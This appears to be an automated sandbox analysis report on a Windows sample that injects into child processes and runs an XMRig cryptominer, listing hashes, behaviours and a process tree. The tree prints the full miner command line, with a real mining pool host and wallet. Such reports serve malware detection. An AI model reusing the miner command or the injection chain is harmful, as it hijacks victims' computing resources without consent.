Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2023, 17:46
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
General
-
Target
tmp.exe
-
Size
2.8MB
-
MD5
a1f7bd3a021e8c779ee8dab8b13aa875
-
SHA1
d097479513bc57e740220dee1a03820b4f2b3b7c
-
SHA256
bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
-
SHA512
0e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12
-
SSDEEP
24576:NDVF5mkwaAr+A+7eGNkqFp4/Bma+mxY4eHGs8E9Ot09OX7l348A5NyvCh1WGn0LZ:LuL3r+A+/N/L4/BFxY+CYfORu4cIPA
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/memory/812-4530-0x0000000140000000-0x00000001407CD000-memory.dmp xmrig behavioral2/memory/812-4534-0x0000000140000000-0x00000001407CD000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation tmp.exe -
Executes dropped EXE 4 IoCs
pid Process 1716 tmp.exe 3596 tmp.exe 1944 tmp.exe 4100 tmp.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1068 set thread context of 4468 1068 tmp.exe 93 PID 1716 set thread context of 3596 1716 tmp.exe 107 PID 3596 set thread context of 812 3596 tmp.exe 108 PID 1944 set thread context of 4100 1944 tmp.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 3688 powershell.exe 3688 powershell.exe 1068 tmp.exe 2008 powershell.exe 2008 powershell.exe 1716 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 712 powershell.exe 712 powershell.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 1944 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe 3596 tmp.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 3688 powershell.exe Token: SeDebugPrivilege 1068 tmp.exe Token: SeDebugPrivilege 4468 tmp.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1716 tmp.exe Token: SeDebugPrivilege 3596 tmp.exe Token: SeLockMemoryPrivilege 812 AddInProcess.exe Token: SeLockMemoryPrivilege 812 AddInProcess.exe Token: SeDebugPrivilege 712 powershell.exe Token: SeDebugPrivilege 1944 tmp.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 812 AddInProcess.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 1068 wrote to memory of 3688 1068 tmp.exe 85 PID 1068 wrote to memory of 3688 1068 tmp.exe 85 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1068 wrote to memory of 4468 1068 tmp.exe 93 PID 1716 wrote to memory of 2008 1716 tmp.exe 104 PID 1716 wrote to memory of 2008 1716 tmp.exe 104 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 1716 wrote to memory of 3596 1716 tmp.exe 107 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 3596 wrote to memory of 812 3596 tmp.exe 108 PID 1944 wrote to memory of 712 1944 tmp.exe 110 PID 1944 wrote to memory of 712 1944 tmp.exe 110 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 PID 1944 wrote to memory of 4100 1944 tmp.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Users\Admin\AppData\Roaming\tmp.exeC:\Users\Admin\AppData\Roaming\tmp.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Users\Admin\AppData\Roaming\tmp.exeC:\Users\Admin\AppData\Roaming\tmp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 44NWGWCDxqX6iv5rBpy8SgZkuVg2N2ymnaZA4KcqF645XbfKpx9MvXXJ4MFSwiNQqcEMQ1Hge5bjmgYXsjG89gEF6M8tnFB.miners2 -p mkay --algo rx/0 --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:812
-
-
-
C:\Users\Admin\AppData\Roaming\tmp.exeC:\Users\Admin\AppData\Roaming\tmp.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\Users\Admin\AppData\Roaming\tmp.exeC:\Users\Admin\AppData\Roaming\tmp.exe2⤵
- Executes dropped EXE
PID:4100
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5ba5882327d45507d8b5582f26a540fd5
SHA14f76eb5aab3cd0d1aec065f0db92c0bd396b3d5e
SHA256569db31e2abb5a62680707d6fd9afa58daf67531f4e4691ca5388f24905acd81
SHA512f605e77e6de02fe50a8ede15b7b7c404cd34fc7965d9834e238806cc7edf7adad38d3e7be5e4ea0f7242750122d7e76a6a3462e19fd6d5990017f1fc828f1053
-
Filesize
1KB
MD51bad2704664b4c1a190586ec492be65f
SHA11c98e6645c66774152c184d23f7a3178ce522e7b
SHA2565950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e
SHA512668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0
-
Filesize
1KB
MD51bad2704664b4c1a190586ec492be65f
SHA11c98e6645c66774152c184d23f7a3178ce522e7b
SHA2565950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e
SHA512668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.8MB
MD5a1f7bd3a021e8c779ee8dab8b13aa875
SHA1d097479513bc57e740220dee1a03820b4f2b3b7c
SHA256bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
SHA5120e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12
-
Filesize
2.8MB
MD5a1f7bd3a021e8c779ee8dab8b13aa875
SHA1d097479513bc57e740220dee1a03820b4f2b3b7c
SHA256bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
SHA5120e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12
-
Filesize
2.8MB
MD5a1f7bd3a021e8c779ee8dab8b13aa875
SHA1d097479513bc57e740220dee1a03820b4f2b3b7c
SHA256bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
SHA5120e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12
-
Filesize
2.8MB
MD5a1f7bd3a021e8c779ee8dab8b13aa875
SHA1d097479513bc57e740220dee1a03820b4f2b3b7c
SHA256bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
SHA5120e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12
-
Filesize
2.8MB
MD5a1f7bd3a021e8c779ee8dab8b13aa875
SHA1d097479513bc57e740220dee1a03820b4f2b3b7c
SHA256bcb7f74cabff9b520fccd6afa1f8d6711fc004b4ad13c49849ee90978fc7873e
SHA5120e536c7a11cc7074d2847fd85eb8ac99e4e0d421d7f27838b55f14d500d8557dc7cde76b57f009e6b40118caa11f042305d926addadad5c241ae496a94e28a12